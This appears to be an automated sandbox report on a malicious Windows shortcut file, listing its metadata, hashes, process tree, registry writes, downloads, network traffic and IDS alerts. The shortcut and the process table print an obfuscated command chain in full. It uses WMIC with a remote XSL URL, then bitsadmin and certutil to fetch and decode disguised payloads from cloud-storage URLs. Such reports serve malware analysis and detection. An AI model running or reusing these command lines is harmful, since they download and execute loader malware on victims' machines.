File name: | Comprovante_Zattini.390.lnk |
Full analysis: | https://app.any.run/tasks/90b3e40b-f5cf-4b08-872b-14165186619c |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 24, 2019, 14:06:35 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=23, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized |
MD5: | A48A820F22CEB01A84A7E873ECC227DD |
SHA1: | 86D8F3471AC1EB51C2C2671E75EBBEB7AFF72ACB |
SHA256: | 018C35D81207FA01DBC486E4294AE3B5AAD6F5B74ABBC2D25E9D25D0FB1131F9 |
SSDEEP: | 48:8Ar11n9SAA446446EATYYjPi5w+K+IKYj5KcQzqG3DzvKr4Jo/x4OZaTGHK5:8w19It6tA7Hb3KY9KnbvKsJgOGgGq5 |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | dedicado-web |
---|---|
IconFileName: | %SystemRoot%\system32\imageres.dll |
CommandLineArguments: | /start /MIN %ComSpec% start /MIN %ComSpec% /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|%ComSpec%" |
Description: | bmcxrs46lee90WYFrmxmes48iu30hWYFixxmudf7iqk4hOLFixvmef78iq26hELqicmved57iq26aELKcmvvhj57ge86dILKncbrhj67ue9dUUIJncxih466le90dY |
LocalBasePath: | C:\Windows\System32\cmd.exe |
VolumeLabel: | - |
DriveType: | Fixed Disk |
TargetFileDOSName: | cmd.exe |
HotKey: | (none) |
RunWindow: | Show Minimized No Activate |
IconIndex: | 23 |
TargetFileSize: | 302592 |
ModifyDate: | 2010:11:21 04:24:03+01:00 |
AccessDate: | 2010:11:21 04:24:03+01:00 |
CreateDate: | 2010:11:21 04:24:03+01:00 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Windows\System32\cmd.exe" /start /MIN C:\Windows\system32\cmd.exe start /MIN C:\Windows\system32\cmd.exe /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%|C:\Windows\system32\cmd.exe" | C:\Windows\System32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3640 | C:\Windows\system32\cmd.exe /S /D /c" echo %x:usf6=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3712 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1944 | C:\\Windows\\system32\\wbem\\WMIC.exe os get f57it6hES, 67hi26a, numberofusers /format:"http://storage.googleapis.com/midgoldem/09/v.txt#025040xiuj6rl9d" | C:\Windows\system32\wbem\WMIC.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 2147749911 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2212 | "C:\Windows\System32\wbem\WMIC.exe" os get AXFWSIIT, XCSBXQWM, QHIMBSHY, lastbootupdate /format:"http://storage.googleapis.com/midgoldem/09/vv.txt#9961769" | C:\Windows\System32\wbem\WMIC.exe | WMIC.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3544 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163 C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
2680 | "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg | C:\Windows\System32\certutil.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4000 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
3208 | "C:\Windows\System32\certutil.exe" -decode C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg.z C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg | C:\Windows\System32\certutil.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: CertUtil.exe Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2304 | "C:\Windows\System32\bitsadmin.exe" /transfer msd5 /priority foreground http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg.z | C:\Windows\System32\bitsadmin.exe | — | WMIC.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (1944) WMIC.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3208 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg | binary | |
MD5:F2CF0BC2A11C62AFA0FD80A3E8CD704D | SHA256:C7F2327AF387BE23D5A6FC7FA9DDC0CA6E7BE180F0588440BE9C3EFCA04A1AAC | |||
2356 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif | binary | |
MD5:3881F37A8404226070C4FA5C77193B29 | SHA256:DB1C1F2AB8C0DC5365D9EE01C758B38904643ABD3B0D462C03584FAEA73F465B | |||
3808 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg | binary | |
MD5:B3F39EEF88A5D1D3C4918E17F00C7F45 | SHA256:D02F75457DB4A054712D07A4D859185AF9C6B26472C4EEBBFD97285BE46DA127 | |||
3076 | cmd.exe | C:\Users\Public\Libraries\temporary\r1.log | text | |
MD5:6FCC95D06CBF92797C500F16EC12B8F6 | SHA256:ACAE594A6FEF0C777E710D212EFFAC0E65CE9128C5543B5233C314840E5823EC | |||
2428 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gif | binary | |
MD5:06C5E02124CAE7A72D67345F5880970C | SHA256:C36EEA80219B821EC6DC40325844285CB3529DE7D7936E88892A8D6B65A6D8DE | |||
4072 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwdx.gif | binary | |
MD5:405572515BC32CF36CFCC9F62DB4C6E8 | SHA256:7F804CF5BACCA1E4A0147D9D52FA7A7FDE923B4AAA7A90725067A2D45780B40A | |||
2212 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\vv[1].txt | xml | |
MD5:A523C5CEBE290B33595527B765A2B5A9 | SHA256:6BDE1BDFC46E54FFAE9A6CDB98E572633896CE7D96A98494E977A5B5F2C3B299 | |||
2904 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwg.gif | binary | |
MD5:F378C07E5D06F3B07FC59A52DE5B231B | SHA256:3F26FA7BA03B9A026DEB7D24866C44DEB3C84FB5B490ABB49440E381511650F3 | |||
3612 | certutil.exe | C:\Users\Public\Libraries\temporary\falxconxrenwxb.~ | binary | |
MD5:B26259F3939707FF780F5F4B00AF5A39 | SHA256:3E5BA74875D9B3743AD4C1002822940FA890E12E22D68A5824C7B09DF3F40868 | |||
1944 | WMIC.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\v[1].txt | xml | |
MD5:DDC4580B1727864527DA836ECFF67434 | SHA256:65C4E0703F3911D87B731671FBAC7D7D4082DABC4907F3ABF690EBF29F892D6A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163 | US | — | — | whitelisted |
2212 | WMIC.exe | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/09/vv.txt | US | xml | 9.88 Kb | whitelisted |
— | — | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 | US | text | 308 Kb | whitelisted |
— | — | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567 | US | text | 308 Kb | whitelisted |
— | — | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwc.jpg.zip.log?719961896 | US | text | 247 Kb | whitelisted |
— | — | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177 | US | text | 1.19 Mb | whitelisted |
— | — | HEAD | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 | US | text | 68.6 Kb | whitelisted |
— | — | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882 | US | text | 247 Kb | whitelisted |
— | — | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567 | US | text | 1.19 Mb | whitelisted |
— | — | GET | 200 | 172.217.18.16:80 | http://storage.googleapis.com/midgoldem/x/09/falxconxrenwg.gif.zip.log?244653065 | US | text | 1.37 Mb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 172.217.18.16:80 | storage.googleapis.com | Google Inc. | US | whitelisted |
1944 | WMIC.exe | 172.217.18.16:80 | storage.googleapis.com | Google Inc. | US | whitelisted |
2212 | WMIC.exe | 172.217.18.16:80 | storage.googleapis.com | Google Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
storage.googleapis.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
1944 | WMIC.exe | A Network Trojan was detected | ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1 |
1944 | WMIC.exe | Misc activity | SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io) |
2212 | WMIC.exe | A Network Trojan was detected | ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1 |
2212 | WMIC.exe | Misc activity | SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io) |